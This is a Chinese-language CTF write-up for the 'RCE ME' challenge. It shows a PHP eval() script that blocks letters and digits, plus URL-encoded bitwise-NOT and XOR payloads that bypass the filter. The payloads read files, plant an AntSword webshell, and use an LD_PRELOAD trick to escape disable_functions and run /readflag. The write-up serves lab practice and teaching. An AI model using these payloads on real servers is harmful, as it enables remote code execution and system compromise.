[极客大挑战 2019]RCE ME
点开题目就是源码
<?php
error_reporting(0);
if(isset($_GET['code'])){
$code=$_GET['code'];
if(strlen($code)>40){
die("This is too Long.");
}
if(preg_match("/[A-Za-z0-9]+/",$code)){
die("NO.");
}
@eval($code);
}
else{
highlight_file(__FILE__);
}
// ?>
代码很简洁,就是GET传参,绕过字母和数字的限制,然后eval执行。
可以用异或拼接或者直接取反,取反比较方便,先试一下system(‘cat /flag’)
?code=(~%8C%86%8C%8B%9A%92)(~%D7%D8%9C%9E%8B%DF%D0%99%93%9E%98%D8%D6);
没有反应,可能有什么被过滤了,再来查看一下phpinfo页面看看有没有什么提示,看到这里禁用了很多函数。
?code=(~%8F%97%8F%96%91%99%90)();
这样的话只能先构造webshell用蚁剑连接以后试试它的绕过功能了。
?code=(~%9E%8C%8C%9A%8D%8B)(~%D7%9A%89%9E%93%D7%DB%A0%AF%B0%AC%AB%A4%9E%A2%D6%D6);
看到了一个flag和一个readflag,但还是不能执行命令。可以用蚁剑的插件绕过disable_function,但是下载插件需要科学上网,我网不好上不去就算了。
看了网上的wp,可以从这个github上下载两个文件bypass_disablefunc.php和bypass_disablefunc_x64.so
然后上传至蚁剑上连接的var/tmp文件夹中,再执行以下payload即可。这里用的是异或绕过,%fe%fe%fe%fe^%a1%b9%bb%aa计算后是_GET.
https://github.com/yangyangwithgnu/bypass_disablefunc_via_LD_PRELOAD
?code=${%fe%fe%fe%fe^%a1%b9%bb%aa}[_](${%fe%fe%fe%fe^%a1%b9%bb%aa}[__]);&_=assert&__=include(%27/var/tmp/bypass_disablefunc.php%27)&cmd=/readflag&outpath=/tmp/tmpfile&sopath=/var/tmp/bypass_disablefunc_x64.so
